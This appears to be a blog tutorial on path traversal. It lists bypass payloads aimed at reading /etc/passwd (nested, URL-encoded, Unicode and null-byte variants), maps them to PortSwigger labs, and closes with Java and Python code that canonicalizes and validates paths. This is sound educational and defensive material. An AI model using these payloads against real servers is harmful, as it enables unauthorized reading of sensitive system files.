🔐 Path Traversal: Notes, Techniques & Attack Types

Ayush Sharma
2 min read

🚀 What is Path Traversal?

Path Traversal, also known as Directory Traversal, is a web vulnerability that allows attackers to access files outside of the intended directory.

🎯 Objective: Read sensitive files (e.g. /etc/passwd, win.ini) or even write files to gain code execution.


🧩 How It Works

Example scenario:

<img src="/loadImage?filename=218.png">

Backend resolves:

/var/www/images/218.png

An attacker sends:

/loadImage?filename=../../../etc/passwd

Backend resolves:

/var/www/images/../../../etc/passwd

💥 Result: Unauthorized access to system files!


🛠️ Bypass Techniques & Attack Variants

1. 🔁 Basic Traversal (Apprentice)

../../../etc/passwd

➡️ Classic directory stepping.


2. 🧬 Absolute Path Bypass

If traversal sequences are blocked:

/etc/passwd

➡️ Directly use absolute paths from filesystem root.


3. 🧩 Nested Traversal Sequences

When ../ gets stripped, try nested obfuscation:

....//....//etc/passwd

➡️ Collapses back to ../../../etc/passwd after a naive filter strips ../ only once.


4. 🧪 Encoded Traversal (URL Tricks)

If filtering occurs before decoding:

  • %2e%2e%2f → decoded once to ../

  • %252e%252e%252f → decoded twice to ../

  • Unicode variants:

    • ..%c0%af

    • ..%ef%bc%8f

💡 Use Burp Intruder’s Fuzzing - Path Traversal wordlist!


5. 📂 Start-of-Path Validation

If the app only checks that the input starts with /var/www/images:

/var/www/images/../../../etc/passwd

➡️ Passes the starts-with check, then climbs out of the directory with ../ sequences.


6. 🖼️ File Extension + Null Byte Bypass

If app expects .png at the end:

../../../etc/passwd%00.png

➡️ %00 is a null byte: the extension check sees .png, but the underlying C-level file API stops reading the string at the null byte (older runtimes such as PHP < 5.3).


🧱 How to Prevent Path Traversal

✅ Best Practices

  • Avoid user-supplied file paths.

  • ✅ Use a whitelist of file names or IDs.

  • ✅ Canonicalize and validate the final path.

🧰 Example in Java

import java.io.File;
// Canonicalize both sides, then require base plus a separator as the prefix,
// so a sibling directory such as /var/www/images2 does not pass the check.
File base = new File(BASE_DIRECTORY).getCanonicalFile();
File file = new File(base, userInput).getCanonicalFile();
if (file.getPath().startsWith(base.getPath() + File.separator)) {
    // Safe to use the file
}
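The same canonicalize-and-validate rule in Python, run against the payloads from the sections above. This is an added example, not code from the post or from any real application: BASE_DIR and PAYLOADS are constructed for it, and naive_resolve is the flawed pattern those bypasses target, shown beside the hardened safe_resolve.

```python
import os
import urllib.parse

# Constructed values for this example: the post's image directory and its
# payloads, written as they would arrive in the ?filename= query parameter.
BASE_DIR = "/var/www/images"
PAYLOADS = {
    "basic":      "../../../etc/passwd",
    "absolute":   "/etc/passwd",
    "nested":     "....//....//etc/passwd",
    "encoded":    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
    "double_enc": "%252e%252e%252fetc/passwd",
    "prefix":     "/var/www/images/../../../etc/passwd",
    "null_byte":  "../../../etc/passwd%00.png",
}

def naive_resolve(base, filename):
    """The flawed pattern the post's bypasses target: strip '../' once from the
    raw input, decode afterwards, and trust a plain string-prefix check."""
    cleaned = filename.replace("../", "")           # '....//' survives a single strip
    path = os.path.join(base, urllib.parse.unquote(cleaned))  # decoding after filtering
    return path if path.startswith(base) else None  # '/var/www/images/../..' still passes

def safe_resolve(base, filename):
    """Decode once, reject NUL, canonicalize, and require the result to sit
    inside the canonical base directory. Returns the resolved path or None."""
    decoded = urllib.parse.unquote(filename)        # decode exactly once, before any check
    if "\x00" in decoded:                            # the %00 truncation trick
        return None
    canon_base = os.path.realpath(base)
    # join() discards base for absolute input, so the containment check below is
    # what actually stops '/etc/passwd'; realpath() collapses every real '..'.
    candidate = os.path.realpath(os.path.join(canon_base, decoded))
    # commonpath, not startswith: '/var/www/images2' must not match '/var/www/images'.
    if os.path.commonpath([canon_base, candidate]) != canon_base:
        return None
    return candidate

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, naive_resolve(BASE_DIR, payload), safe_resolve(BASE_DIR, payload))
```

Note that safe_resolve never needs to recognise the obfuscations: the nested and double-encoded payloads resolve to harmless literal filenames inside the base directory, because the code decodes exactly once and canonicalizes before comparing.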

🔍 Summary: Path Traversal Labs (PortSwigger)

Lab Type: Concept
🧠 Apprentice: Basic file traversal
🔓 Practitioner 1: Absolute path bypass
🎭 Practitioner 2: Nested traversal to bypass sanitization
🧪 Practitioner 3: Encoded traversal sequences
🛤️ Practitioner 4: Start-of-path validation bypass
🧊 Practitioner 5: Null byte + file extension restriction bypass

💡 Pro Tips

  • Combine multiple evasion techniques when needed.

  • Try traversal in:

    • URL paths

    • Query params

    • Multipart forms

    • JSON inputs

    • Headers (like X-File-Path)


🧙‍♂️ Mastering path traversal opens the door to the server’s soul. Just make sure you’re wearing the white hat while you do it. 🕊️
